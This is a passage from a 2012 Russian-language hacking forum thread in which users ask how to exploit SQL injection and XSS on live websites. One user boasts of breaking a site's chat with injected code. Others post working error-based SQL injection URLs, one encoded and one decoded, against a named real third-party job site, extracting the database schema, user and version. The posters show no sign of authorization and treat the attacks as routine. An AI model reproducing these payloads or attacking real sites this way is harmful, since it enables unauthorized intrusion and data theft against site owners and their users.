ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
20.11.2012, 00:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Creator000
Creator000 said:
киньте, пожалуйста, ссылки. а wtb-программирование ведь нало знать да?
google.com
|
|
|
|
21.11.2012, 00:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
2564
Репутация:
0
|
|
Сообщение от Hapk
Hapk said:
Подскажите плиз как можно раскрутить скулу
вот есть сайт
http://site.com/?cnt=articles&item=1 я подставляю кавычку ' ОШИБКИ нету
а вот когда подставляю слеш \ то выскакивает вот такая ошибка
Fatal error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/?cnt=articles&item=1\'' at line 1 : SELECT url FROM air_redirect WHERE url_src = '/?cnt=articles&item=1\' in /home/site/public_html/classes/TObj.php on line 106
Можно ли её раскрутить?
"раскрутили" ?
я знаю сайт с подобной "дырой"
( см. мой пост /showthread.php?p=3340983&posted=1#post3340983 )
|
|
|
|
21.11.2012, 00:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
9682
Репутация:
0
|
|
ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости? А то стремно пока на сторонних ресурсах. на одном доигрался уже. чат отключили из-за меня. хотя в чем моя вина? я не виноват, что гл. админ у сайт туповатая блондинка. там не было никаких фильтров. ЛЮБОЙ код выполнялся. представляйте в чате где пишут только текст, с помощью php вставил html-формы с кнопками. Интересно, с помощью xss можно в текст вставить картинку?
ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости?
|
|
|
|
21.11.2012, 01:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
19438
Репутация:
0
|
|
Сообщение от Creator000
Creator000 said:
ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости? А то стремно пока на сторонних ресурсах. на одном доигрался уже. чат отключили из-за меня. хотя в чем моя вина? я не виноват, что гл. админ у сайт туповатая блондинка. там не было никаких фильтров. ЛЮБОЙ код выполнялся. представляйте в чате где пишут только текст, с помощью php вставил html-формы с кнопками. Интересно, с помощью xss можно в текст вставить картинку?
ребят есть какой-нибудь сайт где можно легально потестить xss-уязвимости?
ставь локальный сервер и тесть сколько влезет
Сообщение от Creator000
Creator000 said:
Интересно, с помощью xss можно в текст вставить картинку?
можно сделать все что умеет JS
|
|
|
|
21.11.2012, 15:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
9682
Репутация:
0
|
|
Сообщение от None
ставь локальный сервер и тесть сколько влезет
а чат где мне взять?
|
|
|
|
21.11.2012, 16:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Creator000
Creator000 said:
а чат где мне взять?
скачать денвер и усановить на комп
|
|
|
|
21.11.2012, 16:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
19438
Репутация:
0
|
|
Сообщение от Creator000
Creator000 said:
а чат где мне взять?
все там же -> google.com
|
|
|
|
21.11.2012, 17:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent='
чёт немогу скулю разкрутиь((
|
|
|
|
21.11.2012, 21:11
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от OxoTnik
OxoTnik said:
Код HTML:
HTML:
http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent=1+Group+by+11
Код HTML:
HTML:
http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent=1%20AND%20%28SELECT%205534%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a666f733a,%28SELECT%20MID%28%28IFNULL%28CAST%28schema_name%20AS%20CHAR%29,0x20%29%29,1,50%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%201,1%29,0x3a7172693a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29
ppcompany_zuМолоток ! +5 за умение пользоваться Havij и после снифать отправленный запрос.
А привести в читабельный вид слабо ?
З.Ы. Не прими близко к сердцу - но вы уже переходите все границы, парни. Мне даже наплевать что в своём запросе ты использовал + вместо %20 как в нижнем. Но элементарно заменить %28%29 на () - уже лень. Я разочарован.
|
|
|
21.11.2012, 21:28
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от BigBear
BigBear said:
Молоток ! +5 за умение пользоваться Havij и после снифать отправленный запрос.
А привести в читабельный вид слабо ?
З.Ы. Не прими близко к сердцу - но вы уже переходите все границы, парни. Мне даже наплевать что в своём запросе ты использовал + вместо %20 как в нижнем. Но элементарно заменить %28%29 на () - уже лень. Я разочарован.
так пойдет?
http://zu.tyt-rabota.ru/performers?page=6&action=search&category_parent=1+ OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+ UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+conca t_ws(0x3a,user()),version(),database())),1,63)+,+ FLOOR(RAND(0)*2)))#
P.S: У меня браузер как то сам в урленкод кидает когда, капирую с адресной строки...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
